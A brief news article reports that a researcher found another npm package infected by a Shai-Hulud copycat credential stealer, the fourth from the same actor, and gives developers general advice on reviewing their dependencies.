A new npm package stealer has been identified, marking the latest in a string of infections that have compromised the security of numerous developer projects. According to findings by a researcher, the new stealer, dubbed a Shai-Hulud copycat, has infected yet another npm package. This brings the total number of infected packages from the same malicious actor to four, including three other stealers found in separate packages.
The npm package stealer is a type of malware that infects packages downloaded from the npm registry, allowing the attacker to steal sensitive data or gain control over the infected system. The infections pose a significant risk to developers who download compromised packages, as they may inadvertently install malware on their systems or expose sensitive information.
npm, the organisation behind the npm registry, has not commented on the latest infection, but developers are advised to exercise extreme caution when downloading packages and to regularly update their dependencies to ensure they have the latest security patches.
The researcher who discovered the new stealer highlighted the importance of secure coding practices and the need for developers to stay vigilant in the face of growing threats to package security.
In the wake of the latest infection, developers are urged to review their package dependencies and update them as necessary to prevent potential security breaches.